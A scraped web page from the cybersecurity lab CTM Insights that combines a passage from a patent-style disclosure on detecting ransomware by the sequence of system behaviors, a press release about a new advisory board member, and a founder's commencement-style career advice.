Additionally, while the approaches in Scaife and Continella may include using a collection of behavioral attributes individually or in combination to detect ransomware, neither leverages the sequence in which those attributes are invoked as a part of developing a behavioral score to test.  For example, a system that writes a number of files and then later reads them is unlikely to be ransomware, since ransomware read operations necessarily predate encrypting, which predates writing.  Bulk operations and caching may appear to skew this to some extent, but the fundamental order of operations is dictated by the malicious behavior of the ransomware.  As such, the sequence, or order, of operations may be used to score the likelihood of ransomware activity and reduce false alarms.  As a result, the present disclosure provides a distinct difference from previous approaches and solutions to ransomware detection and mitigation by proposing to look at system behavior (e.g., a collection of processes) versus individual processes, potentially scoring behavior based on the sequence of operations, and slowing versus stopping the system behavior on suspect systems as well as mitigating or eliminating the need for a transparent file recovery and file replacement mechanism.   

The following describes one or more of the elements that may be included in any embodiment based on the present disclosure.  The embodiments may include, but are not limited to, computer systems, network devices, mobile and wireless devices, including phones, tablets, computers  and the like.

1)    Detection of ransomware based on the behavior of a computer system over a period of time, whether that behavior is the result of a single process or a collection of processes.  

2)    Monitoring the volumes of individual behaviors at the system level, with some or all of the behaviors being scored and thresholded.  Examples of behaviors associated with ransomware that increase the score to be tested include large number of: file reads and writes, file deletion or renaming, high CPU, changes in file type or magic number or file entropy.

3)    In some embodiments, the score may be further increased or affected by the sequence in which some or all of the individual behaviors is detected.

4)    Incrementally slowing a system once ransomware is suspected, to minimize harm until the system can be checked. 

5)    In some embodiments, access to file writes may specifically be incrementally slowed.

Janet Levesque joins CTM's Board of Advisors

JANET LEVESQUE JOINS CTM INSIGHTS ADVISORY BOARD

JULY 18, 2020, YORKTOWN HEIGHTS, N.Y. - CTM Insights, llc ("CTM"), a leading cybersecurity research lab and build studio, announced the appointment of Janet Levesque to its Advisory Board.  Levesque replaces the seat held by Bob Lam, who stepped down to run CTM portfolio company ShardSecure,  Levesque joins other industry luminaries who help guide the investment and operational strategies of CTM's portfolio.  As the former CIO and Data Protection Officer of Mimecast and CISO at RSA, Janet brings a wealth of experience managing current and future cybersecurity risk.

"Cyber adversaries are constantly improving their capabilities, sometimes dramatically," said Levesque.  "CTM is different from other investors and vendors.  They look for the hard problems that will cause real pain, and invest in completely new approaches to solving them.  I'm thrilled to join other world-class advisors that help shape CTM’s approach.”

“Janet has built some of the best, forward thinking cyber security programs anywhere.  She’s both a designer and a practitioner, two skills I deeply respect.  I’m pleased to welcome Janet to the Board and look forward to working with her," said Lou Steinberg, Founder and Managing Partner of CTM.  "I also want to thank Bob for his guidance and wish him great success as CEO of ShardSecure."   

CTM’s ongoing initiatives include ways to limit the damage caused by ransomware, secure data without encryption, stop fraud and eliminate customer challenges though frictionless transaction authorization, and a trust overlay for the Internet.   New research includes creating a method for the efficient detection of attacks against data integrity, such as deep fakes.

About CTM

CTM invests in radically new approaches to solve some of the hardest problems in cyber, providing seed funding and resources to turn them into companies.  In just two years, investments have been made in six "big ideas" which have already resulted in four pending patents and the launch of two companies, Authoriti and ShardSecure , creating a combined IRR of over 200%.

 

A practical commencement address for making smart choices

Like many parents, I have kids who will graduate from their respective schools during this period of COVID-19 uncertainty (Tim from grad school and Becky from high school).  Neither knows if or when they will have a formal commencement ceremony.  That got me thinking about the many commencements I’ve attended over the years; some were entertaining, others just long, but few featured speakers with useful insights. 

In light of this, I decided to offer the commencement keynote I wish I had received.  No lofty platitudes, just eight bits of practical advice for navigating the future.  These are things that I had to figure out for myself in the decades since my own graduations.

1)      Be an exception.  You want an exceptional set of opportunities?  An exceptional career?  Most places are designed to efficiently handle a large group of requests the same, whether the task is approval to move ahead with a project, manage a budget, hire talent, give a promotion, etc.  You can try to circumvent the process when it doesn’t make sense, but that’s not a great idea.  Instead, find a reason that your case is an exception.  Once you are in an exception category, you can get almost anything done that’s reasonable.

2)      You get the job you are doing.  If you want a promotion or a great new assignment, prove you are up to it.  Volunteer to assist, invest some effort, and demonstrate your ability.  That’s far more effective than just asking to be given something.  As Edison once said, “don’t be afraid to earn more than you are paid.”  Earn the job and it will be given to you.

3)      You get what you measure.  As your career progresses, you will find that people pay the most attention to things that are inspected by others.  Create a consistent set of metrics around the “critical few” things that matter most because they have a disproportionate effect on the outcomes you seek.   That also means your metrics have to be balanced so you don’t succeed in one area at the expense of something equally important.  Measure constantly and publicly.  People will focus on what is measured. 

4)      Take risks when the cost of failure is low.  Every decision involves some kind of risk, so take the biggest risks (with the most upside potential) when your downside is limited.  I left a good job and started a company at a time when I knew I could get another job if needed.  It’s also worth remembering that risks accumulate, so if you are taking a lot of risk in one area, don’t simultaneously take risk elsewhere.

5)      Time is the enemy.  There will always be competitors, but they are just competition.  Your enemy is time.  Efforts that take a long time allow other things around them to change— business priorities shift, people take on new roles, economies rise and fall.  If you don’t have a sense of urgency and execute while the conditions are right, the conditions will change.  A boss of mine used to say “the longer it takes, the longer it will take.”

6)      People who can’t communicate work for people who can.  This is extremely important.  Learn the art of public speaking.  Learn to organize your thoughts with mind maps and write clearly.  Avoid jargon and use analogies when communicating with people who don’t deeply know your space.   Join Toastmasters.  Read Tufte’s books.  Learn the art of communicating to others.

7)      Life is long and your industry small.  Be nice to people.  You may meet them again, and they will remember whether you cared about them and their challenges – or just yourself.

8)      Make smart choices.  This neatly summarizes the seven things before it.  Life is a series of choices and consequences.   Sometimes people express this as “you make your own luck.”  It’s true.  Understand the likely (longer-term) outcomes from your actions and decisions, vs. focusing on just the immediate result.  You influence your outcomes far more than you think.

That’s it.  No lofty visions, no inspirational platitudes.  Instead, you have eight bits of practical advice that can be applied throughout all aspects of your life and career.  It took me 35 years to find and distill these, so you just got a 35-year head start.  Use it to do something great.  Make smart choices.

Lou Steinberg is Founder & Managing Partner of CTM Insights, a cybersecurity research lab and early stage incubator